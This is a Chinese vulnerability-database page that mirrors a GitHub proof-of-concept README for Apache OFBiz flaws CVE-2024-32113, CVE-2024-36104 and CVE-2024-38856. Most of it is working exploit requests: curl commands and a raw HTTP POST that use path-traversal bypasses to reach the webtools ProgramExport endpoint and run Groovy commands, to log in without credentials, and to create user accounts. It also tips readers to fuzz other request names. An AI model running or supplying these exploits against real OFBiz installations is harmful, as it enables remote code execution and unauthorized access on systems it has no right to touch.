漏洞平台

POC详情： 220273f013016829310f8df50b25869fe3ccfcb2

来源

https://github.com/RacerZ-fighting/CVE-2024-32113-POC

关联漏洞

标题： Apache OFBiz 路径遍历漏洞 (CVE-2024-32113)
描述：Apache OFBiz是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.13之前版本存在路径遍历漏洞，该漏洞源于受限目录路径名不正确限制。

描述

Apache OfBiz vulns

介绍

# Apache OfBiz vulns

### POC for CVE-2024-32113

The `USERNAME` and `PASSWORD` params can be provided at the `/ecomseo/AnonContactus` interface, which is publicly accessible to anyone.

- POC1：RCE

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

- POC2：You can bypass the login to access the restricted webtools management interface.

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'JavaScriptEnabled=Y'
  ```

- POC3：You can register a regular user account, where `userLoginId` as username. 

  ```shell
  curl --noproxy '*'  -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'enabled=Y' \
  --data-urlencode 'partyId=' \
  --data-urlencode 'userLoginId=30000' \
  --data-urlencode 'currentPassword=12345' \
  --data-urlencode 'currentPasswordVerify=12345' \
  --data-urlencode 'passwordHint=' \
  --data-urlencode 'requirePasswordChange=N' \
  --data-urlencode 'securityQuestion=' \
  --data-urlencode 'SecurityAnswer=' \
  --data-urlencode 'externalAuthId='
  ```

### POC For CVE-2024-36104

- RCE1

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

- RCE2

  ```shell
  curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport' \
  --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
  --header 'Accept: */*' \
  --header 'Host: 127.0.0.1:8443' \
  --header 'Connection: keep-alive' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'USERNAME=t@t.com' \
  --data-urlencode 'JavaScriptEnabled=Y' \
  --data-urlencode 'PASSWORD=12345' \
  --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
  ```

  PS: `;` will make cookie setting throw exception, you need to get cookie manually. 

  ![image-20240514104449523](./README/image-20240514104449523.png)

![image-20240514104433195](./README/image-20240514104433195.png)
=======

### POC For CVE-2024-38856

- RCE

  ```http
  POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 127.0.0.1:8443
  
  groovyProgram=throw+new+Exception('id'.execute().text);
  ```

  **PS**：The `forgotPassword` can be replaced with other requests. You can try searching for it in `webapp/webtools/WEB-INF/controller.xml` (as shown in the picture) to perform fuzzing. As long as the request successfully returns `success`, it can trigger RCE in the `ProgramExport` module.

  ![image-20240604195154504](README/image-20240604195154504.png)

文件快照


 [4.0K]  /data/pocs/220273f013016829310f8df50b25869fe3ccfcb2
├── [4.0K]  README
│   ├── [417K]  image-20240514104433195.png
│   ├── [324K]  image-20240514104449523.png
│   └── [ 41K]  image-20240604195154504.png
└── [4.3K]  README.md

1 directory, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。